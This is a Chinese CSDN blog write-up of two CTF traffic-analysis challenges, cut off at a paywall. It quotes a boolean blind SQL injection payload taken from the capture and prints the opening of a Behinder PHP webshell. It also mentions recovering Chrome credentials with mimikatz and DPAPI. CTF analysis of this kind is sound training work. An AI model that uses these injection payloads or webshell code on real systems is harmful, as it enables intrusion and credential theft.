3CTF的两道流量分析题

最新推荐文章于 2023-08-11 16:34:58 发布
最新推荐文章于 2023-08-11 16:34:58 发布
阅读量2.6k 收藏 8
点赞数 1
分类专栏: CTF-Misc 文章标签: CTF Misc
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Laurel_60/article/details/102932373
版权
本文介绍了3CTF比赛中两道流量分析题的解题过程。第一题涉及HTTP流量中的bool盲注,通过解压文件、明文攻击获取flag。第二题涉及冰蝎动态二进制加密,通过分析流量包、解密攻击内容,利用DPAPI和Master Key File恢复Chrome密码。解题方法包括使用mimikatz和Windows Password Recovery软件。
摘要由CSDN通过智能技术生成

文章目录

第一道忘了叫啥了

题目链接:https://url.cn/5EvIRl6
提取码:i6ir

是初赛的Misc1题目,给了一个1.pcap文件。内容是黑客进行bool盲注的过程。

看一下HTTP,很容易看到一个readme.7z的压缩包,导出来,就一个readme.txt,没啥了。

然后可以注意到,盲注过程中响应内容的大小不是706bytes就是722bytes。(刚开始我还在想这尼玛会不会是二进制,对不起打扰了

706字节 - -
在这里插入图片描述
722字节 - -
在这里插入图片描述
比如说,攻击者刚开始爆数据库个数时:

?id=1' and ((select count(schema_name) from information_schema.schemata) > 0)#

一直到 >6都返回的是706字节,而>7时,返回了722字节,说明这时候相当于是报错了,也就是说个数应该是7。

突然发现盲注这块是我的盲点,,哭了

然后看到后面开始查询字段的时候,看到是有urlpasswd两个字段。
在这里插入图片描述
嗯所以需要根据回显内容把这两个字段给解出来,一位一位地慢慢解,,

在这里插入图片描述
解出来是这样的(然鹅我令人堪忧的数学把我带到了上一个字符去2333:

url:
116 46 99 110 47 65 105 56 80 104 113 83 98
t.cn/Ai8PhqSb
passwd:
98 107 105 115
bkis

这个短链接其实是个百度网盘 - -
在这里插入图片描述
flag.zip是加密的,内容有flag.txt和readme.txt。

那么这就很容易想到了明文攻击了(虽然比赛的时候我没想到,因为我当时做题已经做傻了,,

嗯然后AAPR明文跑密钥解密就完事儿了。flag{1d0ea6a36f6aaf7fa5d4b007454227d6}

当然也有师傅闲着没事儿跑了一个多小时把口令也跑出来了:CtF36o!s0
在这里插入图片描述

第二道好像是叫黑客攻击啥的

题目链接:https://url.cn/5JhQXkI
提取码:txnq

复赛的流量题。首先看到的是shell脚本:

<?php
@error_reporting(0);
session_start();
if (isset($_GET['pass']))
{
   
    $key=substr(md5(uniqid(rand())),16);
    $_SESSION['k']=$key;
    print $key;
}
else
{
   
    $key=$_SESSION['k'];
	$post=file_get_contents("php://input");
	if(!extension_loaded('openssl'))
	{
   
		$t="base64_"."decode";
		$post=$t($post."");
		
		for($i=0;$i<strlen($post);$i++) {
   
    			 $post[$i] = $post[
最低0.47元/天 解锁文章
将至将至
关注
专栏目录
CTF misc流量分析 password secret.log
mutou990的博客
08-27 2093
参考:【迎圣诞,拿大奖】+流量分析+Writeup分享 171221 杂项-i春秋【迎圣诞】(可恶的黑客、流量分析) 手里还有一个pcapng数据包没看,拿来分析 导出为HTTP对象发现大部分都是baidu和sougo的干扰流量 除此以外有两个paste.ubuntu.com的,点开分析发现post参数中有jsfuck,放到控制台里运行就弹出了密码 ...
流量分析CTF
weixin_46595570的博客
01-13 5000
目背景 某公司内网网络被黑客渗透,简单了解,黑客首先攻击了一台web服务器,破解了后台的账户密码,随之利用破解的账号密码登陆了mail系统,然后获取了vpn的申请方式,然后登陆了vpn,在内网pwn掉了一台打印机,请根据提供的流量包回答下面有关问 关卡列表 1 某公司内网网络被黑客渗透,请分析流量,给出黑客使用的扫描器 2 某公司内网网络被黑客渗透,请分析流量,得到黑客扫描到的登陆后台是(相对路径即可) 3 某公司内网网络被黑客渗透,请分析流量,得到黑客使用了什么账号密码登陆了web后台(形式
两道CTF流量分析,寻找flag!
03-10
目1:在流量中寻找管理员的密码!提交格式为flag{密码} 目2: 问1:安全审计设备上捕获了一条OPC流量,疑似遭遇黑客攻击,请分析出黑客攻击的流量编号。(仅需找到流量编号即可) 问2:找出藏匿在流量包中的flag(格式为flag{})
[DDCTF2018]流量分析
qq_48511129的博客
08-29 564
在流量包中搜索 tcp contains “KEY” 追踪tcp流发现 解密后为 接着查看流量包,发现一张png图片。复制 进行解码图片 发现图片是一串字母 ORC在线识别:https://www.onlineocr.net/zh_hant/ 进行图片识别 可能会存在一些错误。自己对照字母看一遍 根据提示套上ssh私钥格式 -----BEGIN RSA PRIVATE KEY----- MIICXAIBAAKBgQDCm6vZmclJrVH1AAyGuCuSSZ8O+mIQiOUQCvN0HYbj815.
渗透测试CTF-流量分析
保持微笑的博客
11-03 4060
渗透测试CTF-流量分析
CTF省赛练习笔记(1)流量分析WP
JaySRJ7的博客
10-06 3958
** CTF省赛练习笔记MISC流量分析篇 ** 一、第三届上海市网络安全大赛 流量分析——traffic 1.下载附件用wireshark打开 2.一开始搜索字符串flag没有发现什么有价值的东西,接下来想到筛选一些流量进行分析,在筛选ftp-data时发现有几条流量都含有flag.zip,想到将他们导出分组字节流。 3.经过分析后发现可以导出的是一个key.log和两个压缩包(key.l...
ctf php 流量分析,2020天津市ctf大赛之usb数据包流量分析
weixin_35949064的博客
03-09 629
1.鼠标流量分析1.常用命令tshark -r usb.pcap -T fields -e usb.capdata > usbdata.txt如果提取出来的数据有空行,可以将命令改为如下形式:tshark -r usb2.pcap -T fields -e usb.capdata | sed '/^\s*$/d' > usbdata.txt如果提取出来的数据没有冒号,可以用脚本来加上冒...
CTF——流量分析型整理总结
热门推荐
小锤队长的博客
12-19 5万+
我见过的流量分析类型的目总结: 一,ping 报文信息 (icmp协议) 二,上传/下载文件(蓝牙obex,http,难:文件的分段上传/下载) 三,sql注入攻击 四,访问特定的加密解密网站(md5,base64) 五,后台扫描+弱密码爆破+菜刀 六,usb流量分析 七,WiFi无线密码破解 八,根据一组流量包了解黑客的具体行为 例: 一,ping 报文信息 (icm...
CTF流量分析
m0_37442062的博客
05-03 4006
1.flag被盗了,pcap(gnnl) 尝试http过滤,get或者post追踪tcp流即可,这里是post, flag{This_is_a_f10g} 2.这么多数据包找找吧,先找到getshell的流pcap(vn78) 过滤tcp TCP流通常是命令行操作 Q0NURntkb195b3VfbGlrZV9zbmlmZmVyfQ== 解码:CCTF{do_you_like_sniffer} 3.有一天皓宝宝没了流量只好手机来共享,顺便又从手机发了点小秘密到电脑,你能找到它吗?
2021-10-09 CTF-KX(第一场)-简单的流量分析2
matthewfjnd的博客
10-09 1182
目所需文件 https://download.csdn.net/download/matthewfjnd/30047752 首先先用wireshark打开流量包,并搜索关键字flag,发现一个flag.zip的数据包 查看一下前后的数据流量包,发现了FTP传输flag.zip的痕迹 FTP是明文传输协议,我们可以直接将flag.zip的数据包导出,并保存为flag.zip文件 打开zip文件,发现需要密码 接着去数据包里面找密码,我们发现,流量包里除了一个flag.zip的文件外,还有一个pas
2021年江西省“网络安全”赛B-6:流量分析-中职组(详细讲解)
qq_62686260的博客
06-05 241
B-6:流量分析 2.继续分析capture.pcapng数据包文件,找出黑客通过工具对目标服务器的哪些服务进行了密码暴力枚举渗透测试,将服务对应的端口依照从小到大的顺序依次排列作为Flag 任务环境说明: 服务器场景:Server09 服务器场景操作系统:未知(关闭连接) 系统用户名:administrator密码:123456 1.使用Wireshark查看并分析靶机桌面下的capture.pcapng数据包文件,找到黑客的IP地址,并将黑客的IP地址作为Flag值(如:172.16.1.1)提交;
CTF流量分析之密码文件
最新发布
shy的博客
08-11 1490
深夜里,Hack偷偷的潜入了某公司的内网,趁着深夜偷走了公司的秘密文件,公司的网络管理员通过通过监控工具成功的截取Hack入侵时数据流量,但是却无法分析出Hack到底偷走了什么机密文件,你能帮帮管理员分析出Hack到底偷走了什么机密文件吗?只能导出http流量内的文件,选中想要保存的文件,点击save,即可保存成功,但是保存的文件中还有大量的流量数据包,需要手工删减。6、如果有流量,就追踪TCP流,然后将默认数据保存格式为ASCII,需要修改为原始数据,选择另存为。2、统计-协议分级,发现存在FTP流量。
CTF 入坑新生赛 Misc 流量分析1 (SQL盲注的分析)
Landasika的博客
11-01 4198
本人小白入门,不到之处请大侠指点!!! 解预备知识 wireshark的使用、SQL盲注基本原理 大佬的一片关于流量分析SQL盲注的解: 某行业攻防培训-----流量分析之-----sql盲注_qwsn-CSDN博客 关于SQL盲注的原理: SQL盲注(原理概述、分类)_小赵同学的博客-CSDN博客_sql盲注原理 解思路 用wireshark打开文件,观察后可以发现,这个是一个SQL盲注的流量分析。 ​​ 根据SQL盲注的原理,我们直接搜索1,1 2,1 ...
CTF-misc流量分析
LeeOrange_45的博客
05-11 556
FTP中由两部分,一部分是服务器,一部分是客户端。ftp是tcp的20/21端口,前者用于传输数据,后者用于传输控制信息。最近软件安全有提到所谓的后门,所以得要看xsser提交的文件啥的,并且一般上传了木马之后都会测试一下自己的木马好不好使,所以会调用phpinfo的。正则表达式查询flag,发现确实他在盲注,好了好了,我们就看看他顺序盲注的成果。按照时间顺序来看,第一位注入结果是102,第二位是108,第三位97……使用的传输模式有关,如果采用主动模式,那么数据传输端口就是。0x002 加大难度!
CTF(三)流量分析
发现新世界的博客
06-06 3010
使用wireshark
Bugku流量分析目总结
qq_42857451的博客
11-10 1452
0x01 flag被盗 目链接:https://ctf.bugku.com/files/e0b57d15b3f8e6190e72987177da1ffd/key.pcapng 解思路: 这个目是比较基本的流量分析,拿到数据包后,查看几个数据比较大的可疑数据,追踪TCP流即可拿到flag flag:flag{This_is_a_f10g} 0x02 中国菜刀 目链接:htt...
2019某行业CTF大赛目复现——流量分析(http)
qwsn
11-08 4030
0x01 上目附件: 附件百度网盘链接地址 提取码 目名字 https://pan.baidu.com/s/1e9A4750P_A6Sy5Gq5397VA zp14 http1 0x02 WP复习: 1.首先解压该附件 发现:有一个名为http1的流量包,我们这里使用wireshark软件打开 2.由目可知,与http有关。我们这里筛选http 发现:两个带有flag....
CTF流量解http3.pcapng
catch
08-08 276
【代码】CTF流量解http3.pcapng。
2019年聊城大学网络攻防试与答案解析
5. Capture The Flag(CTF)是一种常见的网络安全竞赛形式,参赛者需要展示攻击和防御技巧,以获取或保护虚拟“旗帜”。 6. Nmap的"-p"参数用于指定扫描的目标端口,可以是TCP或UDP。 7. Linux系统中的"kill"命令...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值